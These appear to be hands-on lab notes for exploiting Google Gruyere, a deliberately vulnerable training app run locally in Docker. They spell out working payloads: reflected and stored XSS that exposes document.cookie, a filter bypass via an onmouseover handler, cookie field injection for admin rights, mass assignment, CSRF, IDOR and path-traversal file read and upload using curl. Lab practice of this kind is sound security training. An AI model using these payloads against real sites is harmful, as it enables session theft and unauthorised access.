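# Run the Gruyere container. The image is a third-party Docker Hub image of a
# deliberately vulnerable app, so bind it to loopback only: a plain
# "-p 8008:8008" publishes the port on every interface of the host.
# --name gives a stable handle so later commands need not guess the id.
docker run -d --name gruyere -p 127.0.0.1:8008:8008 karthequian/gruyere
# list running containers
docker ps
# run Ash inside the container, by name
docker exec -it gruyere /bin/ash
# same thing by id (<docker_id> is the first column of `docker ps`)
docker exec -i -t <docker_id> /bin/ash
# without --name: select the container by image instead of by list position
# (`awk 'FNR == 2'` picks whichever container happens to be listed first,
# which is not necessarily gruyere when other containers are running)
docker exec -it "$(docker ps -q --filter ancestor=karthequian/gruyere | head -n 1)" /bin/ash
# detach from the shell without stopping the container: Ctrl-P then Ctrl-Q
# (the detach sequence only works for a session started with -t)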
Reflected XSS via the uid parameter. Baseline request: /snippets.gtl?uid=test — then the same endpoint with a URL-encoded <script> tag in the query string: /snippets.gtl?uid=+%3Cscript%3Ealert("XSSed!")%3C/script%3E (the page reflects uid into the HTML without escaping; the next line is a quieter probe that prints "1" if the script ran)
<script>document.write(0 + 1)</script>
[test.html] — file to upload as a snippet; it appears to be served from the app's own origin afterwards, so the script runs with access to the session cookie:
<script>
alert(document.cookie);
</script>
/test/test.html  (path where the uploaded file is served; open it while logged in and the alert shows document.cookie — a stored XSS from user-controlled uploads)
You'll notice the <script> tag is replaced by <blocked/>. The filter matches the tag name only, not event-handler attributes, so the same payload works from an onmouseover handler on an ordinary element:
<a onmouseover="alert(1)" href="#">read this!</a>
create a user with the name "foo|admin|author" — the session cookie is a pipe-separated string of the form "<hash>|<user>|admin|author" (see the curl --cookie value below), so a username containing the "|" separator injects the admin and author fields.
Do a GET to: /saveprofile?action=update&is_admin=True — the profile update trusts an is_admin field supplied by the client (mass assignment), and because a state-changing action is accepted over GET it can also be triggered by a crafted link (CSRF).
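# Path traversal out of the instance directory. curl squashes "/../" segments
# client-side before sending the request, so the raw form needs --path-as-is
# to reach the server unchanged; the %2f form survives because curl does not
# decode the percent-encoded slash.
curl --path-as-is http://127.0.0.1:8008/<instance_id>/../secret.txt
curl http://127.0.0.1:8008/<instance_id>/..%2fsecret.txt
# this is crashing the Docker container...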
# delete another user's data: /deletesnippet?index=0 — the snippet index is the only argument, nothing in the request ties the snippet to the caller's own account or carries an anti-CSRF token, so it is both an IDOR and CSRF-able
[secret.txt]
I'm in ur filez
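cd ~/Desktop || exit 1
# Upload secret.txt with a traversal in the multipart filename so the server
# writes it outside the upload directory.
# Every line except the last needs a trailing backslash; without it, the
# --cookie and -F lines are executed as separate commands.
# --cookie must be in NAME=VALUE form: an argument without "=" is read by curl
# as a cookie-jar *file* name. <cookie_name> is the app's session cookie name
# (take it from the browser's cookie store); the value is
# "<hash>|test|admin|author" as the app formats it.
# Only double quotes are special to curl inside a -F value, so single quotes
# around the filename would be sent to the server as part of the name.
curl \
  --cookie "<cookie_name>=<hash>|test|admin|author" \
  -F "upload_file=@secret.txt;filename=../secret.txt" \
  http://127.0.0.1:8008/<instance_id>/upload2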